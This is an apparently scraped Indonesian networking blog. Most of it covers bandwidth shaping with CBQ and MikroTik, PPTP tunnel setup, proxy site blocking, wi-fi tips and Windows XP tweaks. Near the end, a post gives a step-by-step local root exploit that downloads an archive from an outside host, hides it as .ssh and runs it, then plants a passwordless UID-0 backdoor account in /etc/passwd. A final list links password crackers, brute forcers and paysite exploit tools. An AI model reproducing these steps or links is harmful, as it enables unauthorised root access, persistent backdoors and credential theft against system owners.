"Mas, bisa gak dengan peralatan kita yang sekarang untuk membagi Bandwidth untuk setiap klient?". itu kutipan pertanyaan yang sering dilontarkan baik di milis or di forum ini. Kemudian saya mencoba mencari referensi dar teman-teman yang sudah lebih dahulu terjun ke dunia internet tapi kebayanyakan dari mereka merekomendasikan menggunakan mikrotik. Wah selain harus beli saya pikir lebih baik saya mencari alternatif lain yang open source dan tentunya gatis ya saya salah seorang yg suka seusatu yang gratis, semoga anda juga demikian
berkat bantuan rekan saya Google.com akhirnya saya mendapatkan apa yang saya inginkan. ternyata sangat banyak tool yang dapat digunakan untuk membagi bandwidth dan penggunaannya sangat mudah sekali. Bahkan kalo anda menggunakan fedora core 5 anda tidak perlu susah-susah menginstallnya. Nah apa saja sih yang dapat digunakan? berikut adalah tool yang dapat digunakan:
CBQ
HTB
Webmin/CBQ
P2P Grab
Bluestar
pada kesempatan ini saya akan men-sharing kepada anda bagaimana membagi bandwidth mengunakan point yang paling atas (CBQ)
1. Saya asumsikan anda menggunakan Fedora Core 5
2. [root@oprekhouse ~]# cd /etc/sysconfig/cbq
[root@oprekhouse cbq ~]# ls -l
...
-rw-r--r-- 1 root root 11 Feb 12 2006 avpkt
-rw-r--r-- 1 root root 79 Feb 12 2006 cbq-0000.example
3. rename cbq-0000.example misalnya menjadi cbq-256.lansatu
4. edit file cbq-256.lansatu
contoh 1 :
DEVICE=eth1,10Mbit,1Mbit
RATE=256Kbit
WEIGHT=25.6Kbit
PRIO=5
RULE=192.168.1.1/32
contoh 2:
DEVICE=eth1,10Mbit,1Mbit
RATE=512Kbit
WEIGHT=51.2Kbit
PRIO=5
RULE=192.168.1.1/32
Isi file seperti di atas itu artinya anda memberikan bandwidth 256 kepada semua client yang koneksi internet melalui gateway 192.168.1.1. jadi misalnya anda memiliki klien 100 yang terkoneksi itu berarti bandwith 256 itu di share oleh 100 client tersebut.
5. [root@oprekhouse ~]# /sbin/cbq start
kali anda mendapatkan pesan seperti berikut, lakukan langkah ke 6:
find: warning: you have specified the -maxdepth option after a non-option argument (, but options are not positional (-maxdepth affects tests specified before it as well as those specified after it). Please specify options before other arguments.
find: warning: you have specified the -maxdepth option after a non-option argument (, but options are not positional (-maxdepth affects tests specified before it as well as those specified after it). Please specify options before other arguments.
6. [root@oprekhouse ~]# /sbin/cbq restart
7. Selesai
Sekarang silahkan anda cek apakah CBQ sudah benar-benar berjalan dengan baik. Kalau saya menggunakan cari ini
[root@oprekhouse ~]# iftop -i eth1 (eth satu adalah yg ber ip 192.168.1.1)
Semoga bermanfaat
Jan 11, 2009
Membagi Bandwidth Tanpa Mikrotik
Limit Different Bandwidth In Day and Night in Mikrotik
There are lot many ways to limit bandwidth for day and Night, but personally I found this is the easiest way, Here it is.
I have used Simple Queue, Script and Scheduler.
Suppose we have one network 192.168.1.0/24 and want to limit Bandwidth for day and Night Time.
Network 192.168.1.0/24
Bandwidth = 06:00am – 18:00pm – 1Mbps.
Bandwidth = 18:00pm – 06:00am – 2Mbps.
Create two simple queues for the same network with different Bandwidth Limit.
/queue simple
#name=”Day” target-addresses=192.168.1.0/24 dst-address=0.0.0.0/0
interface= parent=none direction=both priority=8
queue=default-small/default-small limit-at=512k/512k
max-limit=1M/1M total-queue=default-small
#name=”Night” target-addresses=192.168.1.0/24 dst-address=0.0.0.0/0
interface= parent=none direction=both priority=8
queue=default-small/default-small limit-at=1M/1M
max-limit=2M/2M total-queue=default-small
Now, write scripts
/system script
#name=”Day” source=/queue simple enable Day; /queue simple disable Night
#name=”Night” source=/queue simple enable Night; /queue simple disable Day
Finally, Schedule it
/system scheduler
#name=”Day” on-event=Day start-date=oct/13/2007 start-time=06:00:00 interval=1d
#name=”Night” on-event=Night start-date=oct/13/2007 start-time=18:
Tutorial Dasar Mikrotik
Mikrotik sekarang ini banyak digunakan oleh ISP, provider hotspot, ataupun oleh pemilik warnet. Mikrotik OS menjadikan computer menjadi router network yang handal yang dilengkapi dengan berbagai fitur dan tool, baik untuk jaringan kabel maupun wireless.
Dalam tutorial kali ini penulis menyajikan pembahasan dan petunjuk sederhana dan simple dalam mengkonfigurasi mikrotik untuk keperluan-keperluan tertentu dan umum yang biasa dibutuhkan untuk server/router warnet maupun jaringan lainya, konfirugasi tersebut misalnya, untuk NAT server, Bridging, BW manajemen, dan MRTG.
Versi mikrotik yang penulis gunakan untuk tutorial ini adalah MikroTik routeros 2.9.27
silahkan download disini
Tutorial Mikrotik VPN : Point to Point Tunnel Protocol (PPTP)
PPTP (Point to Point Tunnel Protocol) supports encrypted tunnels over IP. The MikroTik RouterOS implementation includes support fot PPTP client and server.
General applications of PPTP tunnels:
* For secure router-to-router tunnels over the Internet
* To link (bridge) local Intranets or LANs (when EoIP is also used)
* For mobile or remote clients to remotely access an Intranet/LAN of a company (see PPTP setup for Windows for more information)
Each PPTP connection is composed of a server and a client. The MikroTik RouterOS may function as a server or client – or, for various configurations, it may be the server for some connections and client for other connections. For example, the client created below could connect to a Windows 2000 server, another MikroTik Router, or another router which supports a PPTP server.
Description
PPTP is a secure tunnel for transporting IP traffic using PPP. PPTP encapsulates PPP in virtual lines that run over IP. PPTP incorporates PPP and MPPE (Microsoft Point to Point Encryption) to make encrypted links. The purpose of this protocol is to make well-managed secure connections between routers as well as between routers and PPTP clients (clients are available for and/or included in almost all OSs including Windows).
PPTP includes PPP authentication and accounting for each PPTP connection. Full authentication and accounting of each connection may be done through a RADIUS client or locally.
MPPE 40bit RC4 and MPPE 128bit RC4 encryption are supported.
PPTP traffic uses TCP port 1723 and IP protocol GRE (Generic Routing Encapsulation, IP protocol ID 47), as assigned by the Internet Assigned Numbers Authority (IANA). PPTP can be used with most firewalls and routers by enabling traffic destined for TCP port 1723 and protocol 47 traffic to be routed through the firewall or router.
PPTP connections may be limited or impossible to setup though a masqueraded/NAT IP connection. Please see the Microsoft and RFC links at the end of this section for more information.
PPTP Client Setup
Submenu level : /interface pptp-client
Property Description
name (name; default: pptp-out1) - interface name for reference
mtu (integer; default: 1460) - Maximum Transmit Unit. The optimal value is the MTU of the interface the tunnel is working over decreased by 40 (so, for 1500-byte ethernet link, set the MTU to 1460 to avoid fragmentation of packets)
mru (integer; default: 1460) - Maximum Receive Unit. The optimal value is the MTU of the interface the tunnel is working over decreased by 40 (so, for 1500-byte ethernet link, set the MRU to 1460 to avoid fragmentation of packets)
connect-to (IP address)- the IP address of the PPTP server to connect to
user (string)- user name to use when logging on to the remote server
password (string; default: "")- user password to use when logging to the remote server
profile (name; default: default) - profile to use when connecting to the remote server
add-default-route (yes | no; default: no) - whether to use the server which this client is connected to as its default router (gateway)
Example
To set up PPTP client named test2 using username john with password john to connect to the 10.1.1.12 PPTP server and use it as the default gateway:
[admin@MikroTik] interface pptp-client> add name=test2 connect-to=10.1.1.12 \
\... user=john add-default-route=yes password=john
[admin@MikroTik] interface pptp-client> print
Flags: X - disabled, R - running
0 X name="test2" mtu=1460 mru=1460 connect-to=10.1.1.12 user="john"
password="john" profile=default add-default-route=yes
[admin@MikroTik] interface pptp-client> enable 0
Monitoring PPTP Client
Command name : /interface pptp-client monitor
Property Description
Statistics:
uptime (time) - connection time displayed in days, hours, minutes, and seconds
encoding (string) - encryption and encoding (if asymmetric, separated with '/') being used in this connection
status (string) - status of the client:
# Dialing – attempting to make a connection
# Verifying password... - connection has been established to the server, password verification in progress
# Connected – self-explanatory
# Terminated – interface is not enabled or the other side will not establish a connection
Example
Example of an established connection:
[admin@MikroTik] interface pptp-client> monitor test2
uptime: 4h35s
encoding: MPPE 128 bit, stateless
status: Connected
[admin@MikroTik] interface pptp-client>
PPTP Server Setup
Submenu level : /interface pptp-server server
[admin@MikroTik] interface pptp-server server> print
enabled: no
mtu: 1460
mru: 1460
authentication: mschap2
default-profile: default
[admin@MikroTik] interface pptp-server server>
Description
The PPTP server supports unlimited connections from clients. For each current connection, a dynamic interface is created.
Property Description
enabled (yes | no; default: no) - defines whether PPTP server is enabled or not
mtu (integer; default: 1460) - Maximum Transmit Unit. The optimal value is the MTU of the interface the tunnel is working over decreased by 40 (so, for 1500-byte ethernet link, set the MTU to 1460 to avoid fragmentation of packets)
mru (integer; default: 1460) - Maximum Receive Unit. The optimal value is the MTU of the interface the tunnel is working over decreased by 40 (so, for 1500-byte ethernet link, set the MTU to 1460 to avoid fragmentation of packets)
authentication (multiple choice: pap | chap | mschap1 | mschap2; default: mschap2) - authentication algorithm
default-profile (name; default: default) - default profile to use
Example
To enable PPTP server:
[admin@MikroTik] interface pptp-server server> set enabled=yes
[admin@MikroTik] interface pptp-server server> print
enabled: yes
mtu: 1460
mru: 1460
authentication: mschap2
default-profile: default
[admin@MikroTik] interface pptp-server server>
PPTP Server Users
Submenu level : /interface pptp-server
Description
There are two types of items in PPTP server configuration - static users and dynamic connections. A dynamic connection can be established if the user database or the default-profile has its local-address and remote-address set correctly. When static users are added, the default profile may be left with its default values and only P2P user (in /ppp secret) should be configured. Note that in both cases P2P users must be configured properly.
Property Description
name - interface name
user - the name of the user that is configured statically or added dynamically
Statistics:
mtu - shows (cannot be set here) client's MTU
client-address - shows (cannot be set here) the IP of the connected client
uptime - shows how long the client is connected
encoding (string) - encryption and encoding (if asymmetric, separated with '/') being used in this connection
Example
To add a static entry for ex1 user:
[admin@MikroTik] interface pptp-server> add user=ex1
[admin@MikroTik] interface pptp-server> print
Flags: X - disabled, D - dynamic, R - running
# NAME USER MTU CLIENT-ADDRESS UPTIME ENC...
0 DR ex 1460 10.0.0.202 6m32s none
1 pptp-in1 ex1
[admin@MikroTik] interface pptp-server>
In this example an already connected user ex is shown besides the one we just added.
PPTP Router-to-Router Secure Tunnel Example
The following is an example of connecting two Intranets using an encrypted PPTP tunnel over the Internet.
There are two routers in this example:
* [HomeOffice]
Interface LocalHomeOffice 10.150.2.254/24
Interface ToInternet 192.168.80.1/24
* [RemoteOffice]
Interface ToInternet 192.168.81.1/24
Interface LocalRemoteOffice 10.150.1.254/24
Each router is connected to a different ISP. One router can access another router through the Internet.
On the PPTP server a user must be set up for the client:
[admin@HomeOffice] ppp secret> add name=ex service=pptp password=lkjrht
local-address=10.0.103.1 remote-address=10.0.103.2
[admin@HomeOffice] ppp secret> print detail
Flags: X - disabled
0 name="ex" service=pptp caller-id="" password="lkjrht" profile=default
local-address=10.0.103.1 remote-address=10.0.103.2 routes==""
[admin@HomeOffice] ppp secret>
Then the user should be added in the PPTP server list:
[admin@HomeOffice] interface pptp-server> add user=ex
[admin@HomeOffice] interface pptp-server> print
Flags: X - disabled, D - dynamic, R - running
# NAME USER MTU CLIENT-ADDRESS UPTIME ENC...
0 pptp-in1 ex
[admin@HomeOffice] interface pptp-server>
And finally, the server must be enabled:
[admin@HomeOffice] interface pptp-server server> set enabled=yes
[admin@HomeOffice] interface pptp-server server> print
enabled: yes
mtu: 1460
mru: 1460
authentication: mschap2
default-profile: default
[admin@HomeOffice] interface pptp-server server>
Add a PPTP client to the RemoteOffice router:
[admin@RemoteOffice] interface pptp-client> add connect-to=192.168.80.1 user=ex \
\... password=lkjrht disabled=no
[admin@RemoteOffice] interface pptp-client> print
Flags: X - disabled, R - running
0 R name="pptp-out1" mtu=1460 mru=1460 connect-to=192.168.80.1 user="ex"
password="lkjrht" profile=default add-default-route=no
[admin@RemoteOffice] interface pptp-client>
Thus, a PPTP tunnel is created between the routers. This tunnel is like an Ethernet point-to-point connection between the routers with IP addresses 10.0.103.1 and 10.0.103.2 at each router. It enables 'direct' communication between the routers over third party networks.
To route the local Intranets over the PPTP tunnel – add these routes:
[admin@HomeOffice] > ip route add dst-address 10.150.1.0/24 gateway 10.0.103.2
[admin@RemoteOffice] > ip route add dst-address 10.150.2.0/24 gateway 10.0.103.1
On the PPTP server it can alternatively be done using routes parameter of the user configuration:
[admin@HomeOffice] ppp secret> print detail
Flags: X - disabled
0 name="ex" service=pptp caller-id="" password="lkjrht" profile=default
local-address=10.0.103.1 remote-address=10.0.103.2 routes==""
[admin@HomeOffice] ppp secret> set 0 routes="10.150.1.0/24 10.0.103.2 1"
[admin@HomeOffice] ppp secret> print detail
Flags: X - disabled
0 name="ex" service=pptp caller-id="" password="lkjrht" profile=default
local-address=10.0.103.1 remote-address=10.0.103.2
routes="10.150.1.0/24 10.0.103.2 1"
[admin@HomeOffice] ppp secret>
Test the PPTP tunnel connection:
[admin@RemoteOffice]> /ping 10.0.103.1
10.0.103.1 pong: ttl=255 time=3 ms
10.0.103.1 pong: ttl=255 time=3 ms
10.0.103.1 pong: ttl=255 time=3 ms
ping interrupted
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 3/3.0/3 ms
Test the connection through the PPTP tunnel to the LocalHomeOffice interface:
[admin@RemoteOffice]> /ping 10.150.2.254
10.150.2.254 pong: ttl=255 time=3 ms
10.150.2.254 pong: ttl=255 time=3 ms
10.150.2.254 pong: ttl=255 time=3 ms
ping interrupted
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 3/3.0/3 ms
To bridge a LAN over this secure tunnel, please see the example in the 'EoIP' section of the manual. To set the maximum speed for traffic over this tunnel, please consult the 'Queues' section.
Connecting a Remote Client via PPTP Tunnel
The following example shows how to connect a computer to a remote office network over PPTP encrypted tunnel giving that computer an IP address from the same network as the remote office has (without need of bridging over eoip tunnels)
Please, consult the respective manual on how to set up a PPTP client with the software You are using.
The router in this example:
* [RemoteOffice]
Interface ToInternet 192.168.81.1/24
Interface Office 10.150.1.254/24
The client computer can access the router through the Internet.
On the PPTP server a user must be set up for the client:
[admin@RemoteOffice] ppp secret> add name=ex service=pptp password=lkjrht
local-address=10.150.1.254 remote-address=10.150.1.2
[admin@RemoteOffice] ppp secret> print detail
Flags: X - disabled
0 name="ex" service=pptp caller-id="" password="lkjrht" profile=default
local-address=10.150.1.254 remote-address=10.150.1.2 routes==""
[admin@RemoteOffice] ppp secret>
Then the user should be added in the PPTP server list:
[admin@RemoteOffice] interface pptp-server> add name=FromLaptop user=ex
[admin@RemoteOffice] interface pptp-server> print
Flags: X - disabled, D - dynamic, R - running
# NAME USER MTU CLIENT-ADDRESS UPTIME ENC...
0 FromLaptop ex
[admin@RemoteOffice] interface pptp-server>
And the server must be enabled:
[admin@RemoteOffice] interface pptp-server server> set enabled=yes
[admin@RemoteOffice] interface pptp-server server> print
enabled: yes
mtu: 1460
mru: 1460
authentication: mschap2
default-profile: default
[admin@RemoteOffice] interface pptp-server server>
Finally, the proxy APR must be enabled on the 'Office' interface:
[admin@RemoteOffice] interface ethernet> set Office arp=proxy-arp
[admin@RemoteOffice] interface ethernet> print
Flags: X - disabled, R - running
# NAME MTU MAC-ADDRESS ARP
0 R ToInternet 1500 00:30:4F:0B:7B:C1 enabled
1 R Office 1500 00:30:4F:06:62:12 proxy-arp
[admin@RemoteOffice] interface ethernet>
Blocking web in mikrotik
This example will explain you “How to Block Web Sites” & “How to Stop Downloading”. I have use Web-Proxy test Package.First, Configure Proxy.
/ip proxy
enabled: yes
src-address: 0.0.0.0
port: 8080
parent-proxy: 0.0.0.0:0
cache-drive: system
cache-administrator: "ASHISH PATEL"
max-disk-cache-size: none
max-ram-cache-size: none
cache-only-on-disk: no
maximal-client-connections: 1000
maximal-server-connections: 1000
max-object-size: 512KiB
max-fresh-time: 3d
Now, Make it Transparent
/ip firewall nat
chain=dstnat protocol=tcp dst-port=80 action=redirect to-ports=8080
Make sure that your proxy is NOT a Open Proxy
/ip firewall filter
chain=input in-interface= src-address=0.0.0.0/0 protocol=tcp dst-port=8080 action=drop
Now for Blocking Websites
/ip proxy access
dst-host=www.vansol27.com action=deny
It will block website http://www.vansol27.com, We can always block the same for different networks by giving src-address. It will block for particular source address.
We can also stop downloading files like.mp3, .exe, .dat, .avi,…etc.
/ip proxy access
path=*.exe action=deny
path=*.mp3 action=deny
path=*.zip action=deny
path=*.rar action=deny.
Try with this also
/ip proxy access
dst-host=:mail action=deny
This will block all the websites contain word “mail” in url.
Example: It will block www.hotmail.com, mail.yahoo.com, www.rediffmail.com
ENJOY BLOCKING…….
Blok Situs Porno menggunakan web proxy di mikrotik
Download tutorial untuk memblok situs porno menggunakan fasilitas web proxy di mikrotik, mirip dengan fasilitas block "word" atau kata-kata yang berbau porno, misal; sex, bugil, dsb pada squid proxy.
download disini:
http://indonesiacyber.net/artikel/Block-situs-porno-dengan-mikrotik.doc
Membagi bandwidth secara adil dengan mikrotik
Dengan menggunakan queue type pcq di Mikrotik, kita bisa membagi bandwidth yang ada secara merata untuk para user, saat jaringan pada posisi peak.
step2nya:
1. Asumsi : Network Address 172.16.0.0/12, interface yang mengarah ke pengguna diberi nama Lan, dan interface yang mengarah ke upstream provider diberi nama Public;
2. Ketikkan di console atau terminal :
/ip firewall mangle add chain=forward src-address=172.16.0.0/12 \
action=mark-connection new-connection-mark=users-con
/ip firewall mangle add connection-mark=users-con action=mark-packet \
new-packet-mark=users chain=forward
/queue type add name=pcq-download kind=pcq pcq-classifier=dst-address
/queue type add name=pcq-upload kind=pcq pcq-classifier=src-address
/queue tree add name=Download parent=Lan max-limit=2048000
/queue tree add parent=Download queue=pcq-download packet-mark=users
/queue tree add name=Upload parent=Public max-limit=1024000
/queue tree add parent=Upload queue=pcq-upload packet-mark=users
/queue tree add parent=Lan queue=pcq-download packet-mark=users
/queue tree add parent=Public queue=pcq-upload packet-mark=users
3. selamat mencoba!!
note: LAN dan INTERNET adalah nama interface.LAN interface ke arah user/client,INTERNET interface ke arah ISP.
Jan 9, 2009
10 Cara Modifikasi Hotspot
Apakah anda sudah memaksimalkan wi-fi anda? Apakah anda mau memperkuat, memperjauh, mengamankan, mendeteksi, atau menyembunyikan sinyal wi-fi anda, inilah 10 utility dan modifikasi terbaik untuk pemakai nirkabel kuat.
10. Tingkatkan Jangkauan wi-fi dengan penempatan yang lebih baik.
Walaupun ada beberapa perangkat lunak maupun keras untuk memperkuat sinyal wi-fi, ada juga beberapa hal sederhana yang dapat anda gunakan untuk mendapatkan jangkauan maksimal dari access point (AP) anda. NY Times mengatakan:
* Tempatkan access point anda di tengah lantai teratas, di atas sebuah perabot karena gelombang radio menyebar dengan baik ke arah bawah
* Penerimaan gelombang akan lebih baik apabila sinyal tidak perlu menyebar dengan sudut yang besar, melalui tembok tebal, kaca, akuarium atau apapun logam
* Tempatkan komponen nirkabel jauh dari alat-alat lain yang menyebabkan interferensi seperti telepon nirkabel, microwave dan lampu halogen
* Ubah channel sinyal default dari AP anda (biasanya 6) untuk menghindari interferensi dengan AP milik tetangga
9. Tingkatkan jangkauan sinyal dengan sebuah repeater
Tetap tidak mendapatkan sinyal yang baik di basement? Harus menempatkan laptop anda di jendela untuk mendapatkan sinyal yang baik dari tetangga anda? Belilah sebuah repeater untuk wi-fi (atau ubah router anda sendiri menjadi repeater) untuk meningkatkan jangkauan AP.
Untuk anda yang menggunakan jaringan kabel jauh dari AP, sebuah wireless bridge (terkadang disebut konverter Ethernet) dapat digunakan untuk mengkonversi sinyal nirkabel dan menyediakan beberapa koneksi untuk jaringan ethernet.
8. Tangkap data dengan Wireshark
Anda ingin mengintip data-data yang melewati jaringan nirkabel anda? Anda dapat menggunakan Wireshark (sebelumnya bernama Ethereal) yang merupakan sebuah packet sniffer untuk melihat detil di jaringan nirkabel anda.
7. Gunakan enkripsi WPA
Sekuriti yang diberikan oleh jaringan nirkabel sama sekali tidak memadai, akan tetapi apabila AP anda lebih aman dari yang lain, para cracker jahat lebih berkemungkinan untuk tidak menyentuh jaringan anda. Kebanyakan AP menggunakan enkripsi WEP untuk mencegah dipakainya jaringan nirkabel untuk dipakai oleh yang tidak berwenang, akan tetapi WPA memberikan perlindungan yang jauh lebih baik. Untuk menggunakan WPA, di halaman administrasi situs anda, ubah cara enkripsi dan pakailah sebuah kata kunci yang panjang dan sulit ditebak.
6. Batasi MAC address
Anda dapat membatasi alat-alat apa saja yang masuk ke jaringan nirkabel anda dengan membuat sebuah daftar MAC address yang diperbolehkan untuk mengakses jaringan anda. (Media Access Control address adalah sebuah identifikasi unik untuk semua alat seperti laptop, ponsel, repeater dll). Bukalah layar konfigurasi AP anda dan masukkan daftar MAC address yang diperbolehkan menggunakan jaringan nirkabel anda (contohnya, semua komputer di rumah anda).
5. Berhenti broadcast nama jaringan anda
Tidak mau mempromosikan jaringan anda di daerah sekitar anda? Matikan SSID broadcasting yang akan mencegah laptop tua biasa dan alat-alat lain dari mendeteksi AP anda. Seperti beberapa opsi sekuriti di atas, hal ini tidak akan mencegah pemakai dengan aplikasi yang tepat untuk melihat AP anda, hanya pemakai dengan aplikasi-aplikasi yang tepat di komputer mereka yang dapat mendeteksi AP anda.
4. Deteksi jaringan dengan NetStumbler
Aplikasi NetStumbler yang gratis dan bagus untuk Windows akan mendeteksi semua jaringan nirkabel di area anda, termasuk jaringan-jaringan yang tidak menggunakan SSID broadcasting, tidak peduli apakan mereka diberi password dan seberapa lemah sinyalnya.
3. Berbagi jaringan komputer anda secara nirkabel
Berada di sebuah kamar hotel dengan sebuah koneksi internet dan dua laptop? Sambungkan sebuah laptop dan gunakan komputer terseut untuk berbagi koneksi internet dengan dua komputer secara nirkabel. Inilah caranya.
2. Perkuat sinyal anda dengan sebuah kertas tinfoil
Apabila lokasi tinggi tetap tidak memberikan kekuatan sinyal yang memadai, video ini memperlihatkan bagaimana cara membuat tinfoil yang dibuat menjadi sebuah parabole "Windsurfer" untuk memperkuat sinyal wi-fi anda.
1. Tingkatkan kemampuan router wi-fi anda dengan firmware DD-WRT
Perkuat sinyal, atur pemakaian bandwidth untuk aplikasi-aplikasi tertentu, ubah router tua anda menjadi sebuah repeater dan lebih lagi dengan menginstal firmware berbasis Linux DD-WRT yang dapat memberikan banyak opsi konfigurasi baru untuk router nirkabel anda. Ikuti instruksi ini.
Menjadikan StarUp WIndows Jadi Wush........
ini trik buat loading windows XP lebih ngacirrrrrr .....
kosongkan isi folder \WINDOWS\Prefetch dgn cara spt ini :
(klik Start > Run, kemudian ketik "regedit" di windows Run) dan arahkan ke:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Se ssion Manager\Memory Management\PrefetchParameters\EnablePrefetcher=0
kalo mau lebih sip ... matikan service yang ga perlu...
start > run > services.msc...
windows ga usah pake themes... dan pemanis lainnya...
setelah trik itu...
gw startup windows cuman butuh 1 menit udah masuk destop...
SHUTDOWN
Buatlah Windows XP untuk tidak membersihkan paging file saat shutdown.
Untuk alasan keamanan, biasanya Windows XP akan membersihkan paging file di PC Anda (pagefile.sys) dari semua isinya kapan saja Anda melakukan shutdown.
Paging file ini digunakan untuk menyimpan file dan data sementara, namun sistem Anda ter-shutdown, semua informasi ini tetap ada di file itu. Beberapa orang lebih suka paging file dibersihkan pada saat shutdown karena beberapa informasi penting seperti password yang tidak ter-encrypt seringkali bisa dilihat di file ini. Namun proses pembersihan paging file ini dapat secara signifikan memperlambat waktu dari shutdown, jadi kalau keamanan bukan prioritas utama Anda, mungkin Anda merasa tidak perlu untuk membersihkannya. Untuk shutdown XP tanpa membersihkan paging file, jalankan Registry Editor
(klik Start > Run, kemudian ketik "regedit" di windows Run) dan arahkan ke:
HKEY_LOCAL_MACHINE\ SYSTEM\ CurrentControlSet\ Control\ Session Manager\Memory Management
Ganti nilai dari ClearPageFileAtShutdown ke 0.
Tutup Registry Editor, dan restart komputer Anda. Setelah ini, kapan saja Anda mematikan XP. paging file tidak akan dibersihkan dan seharusnya proses shutdown akan berjalan lebih cepat.
silahkan coba ya broooooo.... have a nice day
maaf kl repost, cm ingin berbagi saja kok.
mengeksploit local root
wget geocities.com/suji.2007/root.tar.gz, atau
fetch http://www.geocities.com/suji.2007/root.tar.gz
tar –xzvf root.tar.gz
rm –rf root.tar.gz
mv root .ssh
chmod 777 .ssh
cd .ssh
./root
Apabila hasil yang ditampilkan dari command diatas memunculkan kata “Signed …… OK” berikut nomor pid (Contoh : 13657), maka anda telah berhasil mencapai access root. Stelah berhasil dalam mengeksploit local root, gunakan command berikut :
Whoami <----- Untuk mengetahui access anda dalam shell pada saat
beroperasi
Su
Adduser (Username)
(Password User)
Baiklah, ada cara lain yang memungkinkan kita mendapatkan root. Pada metode pertama, kita mengetikkan 'linuxconf' pada bash shell prompt, bagaimanapun, kita dapat mengetik hal berikut untuk membuat suatu account baru dengan kemampuan root dan tanpa password:
echo "suji::0:0:::" >> /etc/passwd
Perintah ini secara langsung mengedit file /etc/passwd yang merupakan password file yang menyimpan Password dan Username dari untuk account pada mesin tersebut. Sesuatu hal yang perlu diingat disini adalah anda hanya dapat mengedit file /etc/passwd jika anda melakukan login sebagai root, dan dalam hal ini kita melakukan boot ke linux dengan linux single, jadi kita dapat melakukannya.Untuk mengerti bagaimana persisnya perintah diatas bekerja dan bagaimana hal tersebut dapat membuat suatu account baru tanpa password, kita perlu mengerti struktur file /etc/passwd.Berikut ini adalah suatu baris dari password file:
suji:my_password:2:3:suji antho:/home/ankit:/bin/bash
Baris tersebut diatas dapat dipecahkan menjadi:
? Username: ankit
? Encrypted Password: my_password
? User number: 2
? Group Number: 3
? Actual Name: Ankit Fadia (Optional)
? Home Directory: /home/ankit (Optional)
? Type of Shell: /bin/bash (Optional)
Pada perintah diatas, kita tidak mengikutsertakan field-field optional
dan field password. Perintah kita:
echo "suji::0:0:::" >> /etc/passwd
dapat ditulis sebagai:
? Username: suji
? Encrypted Password:
? User number: 0
? Group Number: 0
? Actual Name:
? Home Directory:
? Type of Shell:
Pada dasarnya hal ini akan membuat suatu account baru dengan kemampuan root, yang mana dapat anda gunakan sebagai Backdoor kedalam sistem.“ SEMOGA TUTORIAL INI DAPAT BERMANFAAT,JANGAN CEPAT PUTUS ASA ”SELAMAT MENCOBA"
Tools Buat Hacking
Code:
http://www.freewebs.com/t800t/MagicFilter.rar
Raptor3 [belt sinicizes patch] Twisted Evil
Code:
http://www.freewebs.com/t800t/Raptor3.zip
The SuperDic_V3.2 registration version [easy superior super dictionary production tool, function to be good]
Code:
http://www.freewebs.com/t800t/SuperDic_V32.zip
Pwdmaker_1.151:
Code:
http://www.freewebs.com/t800t/pwdmaker_1.151.rar
Decodes the tool: John the Ripper
Code:
http://www.xisp.org/downloads/jtr.zip
AUthX
Code:
http://www.freewebs.com/t800t/AUthX.rar
Withdraws the password and processes the LOG files tool:
Z_nakeR2 [ very good log processing tool may process the many kinds of log documents ]
Code:
http://www.freewebs.com/t800t/Z_nakeR2.zip
ccbrip
Code:
http://www.xisp.org/downloads/ccbillrip.zip
ibillrip
Code:
http://www.xisp.org/downloads/ibillrip.zip
*Accessdiver (AD) by Jean Fages
Code:
http://www.accessdiver.com (http://www.accessdiver.com/)
*Sentry by Sentinel:
Code:
http://sentinel.deny.de/sentry.php
*Form@ (specifically for FORM sites) by SSS -
Code:
http://sss.deny.de/
Caecus by Sentinel (For form sites that require an OCR [t4wsentry.pl])
Code:
http://sentinel.deny.de/Caecus.php
Ares by Gamoaa -
Code:
http://www.xisp.org/downloads/FACE_Setup.zip
Brutus
Code:
http://www.hoobie.net/brutus/
AuthForce by Zachary P. Landau
Code:
http://kapheine.hypa.net/authforce/index.html
Entry by Sparkleware
Code:
http://www.sparkleware.com/entry/index.html
Xavior By LithiumSoft
Code:
http://www.btinternet.com/~lithiumsoft/Products.html (http://www.btinternet.com/%7Elithiumsoft/Products.html)
Web Password Checker (WPC) .1 For UNIX by g1soft
Code:
http://www.securityfocus.com/tools/885/scoreit
Munga Bunga's http Brute Forcer by Munga Bunga
Code:
http://www.hackology.com (http://www.hackology.com/)
Wordlist Tools:
*Raptor 3 by Madmax -
Code:
http://madmax.deny.de/downloads/raptor.zip
Words Extractor
Code:
http://www.intellitamper.com/wordsextractor/
Lucifer by Rhino -
Code:
http://rhino.deny.de/lucifer.php
ALS_novice by Wolfman -
Code:
http://wolfman.deny.de/tools.html
Z-leecher by Beda
Code:
http://goldmaster.webpark.cz/sleech.html
S-Generator by Beda
Code:
http://goldmaster.webpark.cz/sgen.html
S-WordlistTool by Beda
Code:
http://goldmaster.webpark.cz/swordt.html
Proxy Tools:
*Proxyrama By Gaamoa -
Code:
http://gaamoa.deny.de/
*Charon by Rhino -
Code:
http://www.icefortress.com/hosts/rhino/
*Advanced Proxy Leecher (APL) by Sentinel-
Code:
http://sentinel.deny.de/apl.htm
Geowhere by Jean Fages (NOT-Freeware) -
Code:
http://www.geowhere.net/
Proxy List Filter -
Code:
http://www.freeproxy.ru/en/programs/proxy_filter.htm
AATools by Glocksoft
Code:
http://www.glocksoft.com/aatools.htm
Proxy Checker by Hell Labs
Code:
http://www.helllabs.com.ua/labs. ... page=1&lang=en_
Proxy Bag
Code:
http://www.intellitamper.com/proxybag/
S-Proxy Tool by Beda
Code:
http://goldmaster.webpark.cz/sproxy.html
Exploiting Tools:
*Triton (Scanner) by Rhino -
Code:
http://rhino.deny.de/triton/index.php
*CMX IV by Xtremnet -
Code:
http://xtremet.deny.de/products.htm
CCBill Local Cgi Exploiter By Ksoze-
Code:
http://ksoze.deny.de/ccbill_exp.html
IBT2 by wolfman:
Code:
http://wolfman.deny.de/tools.html
Hephaestus's Ashen Spear by Wolfman:
Code:
http://wolfman.deny.de/HAS.php
H-scanner by Carpetboy
Code:
http://kellogs.hypermart.net/Carpetboy/ … canner.zip (http://kellogs.hypermart.net/Carpetboy/HScan/H-Scanner.zip)
Harvester by Madmax
Code:
http://www.icefortress.com/hosts ... ester/harvester.htm
Intellitamper
Code:
http://www.intellitamper.com/infos.php
Putty
Code:
http://www.chiark.greenend.org.uk/~sgtatham/putty/ (http://www.chiark.greenend.org.uk/%7Esgtatham/putty/)
Decrypting Tools:
*John The Ripper (JTR) -
Code:
http://www.openwall.com/john/
MDcrack (MD5 Cracker) -
Code:
http://membres.lycos.fr/mdcrack/
